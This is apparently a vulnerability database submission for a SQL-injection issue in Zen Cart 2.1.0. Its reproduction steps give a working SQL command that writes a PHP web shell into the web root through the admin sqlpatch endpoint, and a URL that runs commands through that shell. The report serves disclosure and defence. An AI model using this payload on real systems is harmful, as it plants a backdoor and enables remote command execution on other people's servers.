| शीर्षक | Zen Ventures, LLC Zen-Cart 2.1.0 SQL Injection |
|---|
| विवरण | Description
The [/zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch] endpoint allows admins to run SQL queries. This feature was created to allow developer to manually configure or modify the database but there is a problem, this feature allows you to write files including PHP shells and access them which results in RCE. This is because secure_file_priv is not set, creating a critical security issue.
Reproduce
Go to the following endpoint:
/zencart/Horse-Kgc-fRizz/index.php?cmd=sqlpatch
Use the following SQL command to upload shell to zencart directory:
SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/zencart/shell.php';
Access the shell:
http://127.0.0.1/zencart/shell.php?cmd=id |
|---|
| स्रोत | ⚠️ https://hkohi.ca/vulnerability/29 |
|---|
| उपयोगकर्ता | 0xHamy (UID 88518) |
|---|
| सबमिशन | 29/07/2025 08:29 PM (9 महीनों पहले) |
|---|
| संयम | 08/08/2025 10:09 PM (10 days later) |
|---|
| स्थिति | स्वीकृत |
|---|
| VulDB प्रविष्टि | 319294 [Zen Cart 2.1.0 index.php?cmd=sqlpatch कमजोर प्रमाणीकरण] |
|---|
| अंक | 20 |
|---|